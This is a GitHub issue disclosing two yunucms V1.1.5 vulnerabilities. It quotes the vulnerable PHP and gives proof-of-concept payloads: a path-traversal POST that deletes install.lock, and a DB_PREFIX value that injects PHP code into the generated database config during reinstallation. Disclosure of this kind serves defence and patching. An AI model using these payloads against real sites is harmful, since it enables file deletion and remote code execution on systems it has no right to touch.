Skip to content

Arbitrary File Deletion & Launch a new installation process to execute PHP code #1

Open
@36huo

Description

@36huo

Two issue was discovered in yunucms V1.1.5。
1、Arbitrary File Deletion
2、Launch a new installation process to execute PHP code

1、There is a Arbitrary File Deletion attacks vulnerability which allows remote attackers to unlink any file

The code section which made this vulnerability possible is found in the /statics/ueditor/php/vendor/Local.class.php file:
line 34-68

	public function remove(){
		$file = trim($_POST['key']);
		$config    = $this->config;

		$root_path = $config['root_path'];

		//安全验证
		$pathlist = explode("/", $file); 
		if ($pathlist[0] != 'uploads' && $pathlist[1] != 'uploads') {
			return array(
				'state' => 'ERROR',
				'error' => 'Folders start from uploads'
			);
			exit();
		}

		$file_path = $root_path.$file;
		if( file_exists($file_path) ){
			$result = @unlink($file_path);
			if( $result ){
				return array(
					'state' => 'SUCCESS'
				);
			}else{
				return array(
					'state' => 'ERROR',
					'error' => 'delete file error'
				);
			}
		}

		return array(
			'state' => 'ERROR',
			'error' => 'file not exists'
		);
	}

In the remove() function shown above, the content of $_POST['key'] gets used in the call to unlink() without undergoing any authentication or sanitization.

POC

url:/statics/ueditor/php/controller.php?action=remove
POST: key=/uploads/../data/install.lock

image

/data/install.lock has been removed.

2、Launch a new installation process to execute PHP code
After remove /data/install.lock ,remote attackers can Launch a new installation process.
The code section which made this vulnerability possible is found in the /statics/app/index/controller/Install.php file:
line 117-131

	        //修改数据库文件
	        $coffile = CONF_PATH.DS.'database.php';
            Config::load($coffile, '', 'database');
            $conflist = Config::get('','database');
            $param = array(
            	'hostname'	=>	$data['DB_HOST'],
            	'hostport'	=>	$data['DB_PORT'],
            	'database'	=>	$data['DB_NAME'],
            	'username'	=>	$data['DB_USER'],
            	'password'	=>	$data['DB_PWD'],
            	'prefix'	=>	$data['DB_PREFIX']
           	);

            setConfigfile($coffile, array_merge($conflist, $param));
	        $showstr .= show_msg('配置数据库信息完成...');

Follow function setConfigfile(),in /app/admin/common.php file:
line 76-87

//写入配置文件
function setConfigfile($file, $arr){
    $str="<?php \nreturn [\n";
    foreach($arr as $key=>$v){
        /*$v = htmlspecialchars_decode($v);
        $v = htmlspecialchars($v);*/

        $str.= "\t'".$key."'=>'".$v."',\n";
    }
    $str.="];\n";
    file_put_contents($file, $str);
}

Use file_put_contents to wirte $arr into $file(config\database.php)

POC
In installation process setup2 ,we can input yunu_',].die(file_put_contents('uploads\image\f4ck.php','<?=phpinfo();?>'));$a=['a'=>' to 数据表前缀 DB_PREFIX
image

When finish installation process,we can get /data/database.php like this:
image

Visit homepage http://127.0.0.1:81,will create file /uploads/image/f4ck.php
image

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions